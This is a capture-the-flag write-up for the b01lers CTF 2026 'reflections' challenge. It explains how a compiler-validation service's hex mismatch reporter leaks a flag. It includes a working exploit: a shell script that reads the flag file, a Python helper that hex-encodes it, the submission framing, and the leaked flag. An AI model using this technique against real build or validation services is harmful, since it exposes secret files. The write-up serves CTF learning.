miscfreemedium

reflections

b01lersc

Task: a remote service accepts up to two calc1 compiler submissions and validates each by comparing its stdout to a trusted compiler, printing mismatches in hex. Solution: emit a plain executable shell script instead of a real compiler and use the validation mismatch oracle to leak the flag from stdout.

$ ls tags/ techniques/
mismatch_oracle_exfiltrationexecutable_script_outputdirect_hex_payload_emission

reflections — b01lers CTF 2026

Description

The man in the mirror nods his head

We are given a service that accepts calc1 source, compiles it with the current compiler, marks the result executable, and then runs validation tests against it. The obvious theme is Ken Thompson's “Reflections on Trusting Trust”: upload a compiler, make it become the next trusted compiler, and maybe smuggle a Trojan through the self-hosting chain.

The trick is that we do not need a two-stage trusting-trust backdoor at all. The server itself provides a much simpler oracle: when a validation test fails, it prints both the expected and actual stdout in hex. If we can make the produced executable print the flag, the first failed test leaks it immediately.

Summary

The service processes up to two submissions separated by the raw token &&. Each submission is compiled by /app/compiler_wrapper, which dispatches to /tmp/compiler; initially that symlink points to /app/calc1. The produced file is only required to be executable, not a valid ELF binary, so we can emit a plain shell script that prints the flag.

When the server validates the new "compiler", it computes the expected output with the current trusted compiler and the actual output with our generated executable. On the first mismatch it prints both values as hex, capped to 64 bytes. Since a normal flag is shorter than that cap, one failing test is enough to exfiltrate the whole flag.

Recon

Relevant files were:

  • server.py
  • compiler_wrapper.c
  • calc1, calc1.he, calc1_compat.c
  • local solve helpers make_payload.py and payload.he

The core flow in server.py is:

  1. Read one submission until raw &&.
  2. Save it as /tmp/temp.he.
  3. Run /app/compiler_wrapper, which executes /tmp/compiler, to build /tmp/calc<random>.
  4. chmod +x the output.
  5. Run many randomized calc1 test cases.
  6. Compute:
    • expected = run_compiler(COMPILER, test_input)
    • actual = run_compiler(new_binary, test_input)
  7. On mismatch, print both expected and actual as hex via format_bytes(..., limit=64).

Two details matter immediately:

  • CURRENT_COMPILER starts as a symlink to /app/calc1, so the first stage is built by the original compiler.
  • The generated file is just made executable and then run. There is no ELF magic check, so a text script with a shebang is valid.

Root Cause

The challenge intended us to think about self-reproducing compilers and trusting-trust style persistence, but the validation layer introduced a stronger primitive than intended.

The bug is an information leak through the mismatch reporter:

if actual != expected: print( f"Test {test_index} ({test_name}) failed. " f"Expected: {format_bytes(expected)}, Got: {format_bytes(actual)}" )

That turns every failed test into a controlled stdout oracle. Since actual is taken from executing our produced file, we can choose what gets printed. Because the output is hex-encoded and truncated only after 64 bytes, a short secret such as bctf{...} fits comfortably.

So instead of building a malicious compiler that survives into a second stage, we can submit calc1 source that directly emits an executable script whose stdout is the flag. The very first validation test leaks it.

Exploit

1. Emit a script, not a real compiler

The payload script was:

#!/bin/sh cat /app/flag.txt 2>/dev/null || cat /srv/app/flag.txt

This works because the server only requires the built output file to be executable. A shell script with a valid shebang satisfies that requirement.

2. Encode the script as raw calc1 hex bytes

The original compiler accepts direct hex bytes, so the calc1 source was simply the raw byte stream of the script, formatted as hex pairs. The local helper used during the solve was:

#!/usr/bin/env python3 from pathlib import Path script = b"#!/bin/sh\ncat /app/flag.txt 2>/dev/null || cat /srv/app/flag.txt\n" hex_lines = [] for i in range(0, len(script), 16): chunk = script[i:i + 16] hex_lines.append(" ".join(f"{b:02x}" for b in chunk)) payload = "\n".join(hex_lines) + "\n" Path("payload.he").write_text(payload) print(payload, end="")

3. Respect the && token parser

server.py splits submissions on the raw bytes &&, so that delimiter must not appear anywhere inside the payload content. The shell script above avoids that pitfall.

To make the service process and close cleanly during the solve, the final submission was:

<contents of payload.he> && &&

That gives the first real stage followed by an empty second stage. The second stage later causes an exec format error, but that happens only after the flag has already been leaked. It is incidental, not part of the core exploit.

Recovering the Flag

The first validation case is direct hex bytes with input 7f 45 4c 46\n, so the trusted compiler outputs the bytes 7f454c46 (\x7fELF). Our script ignores stdin and prints the flag instead, causing an immediate mismatch.

The service response included:

Test 1 (direct hex bytes) failed. Expected: 7f454c46, Got: 626374667b5768305f77316c6c5f495f74727573375f4e30777d

Decoding the Got field from hex gives:

bctf{Wh0_w1ll_I_trus7_N0w}

This is comfortably below the 64-byte leak cap, so no multi-request reconstruction was needed.

Lessons Learned

  • A trusting-trust theme does not matter if the service leaks attacker-controlled stdout before any persistence is needed.
  • If a generated file is only required to be executable, a shebang script is often enough; ELF generation may be unnecessary.
  • Hex-encoded mismatch output is still an oracle. Truncation only helps if the secret is longer than the cap.
  • Token-based framing can break payloads in surprising ways; here raw && inside the source would have split the submission.
  • The second empty stage and resulting exec format error were a red herring after the flag had already been recovered.

$ cat /etc/motd

Liked this one?

Pro unlocks every writeup, every flag, and API access. $9/mo.

$ cat pricing.md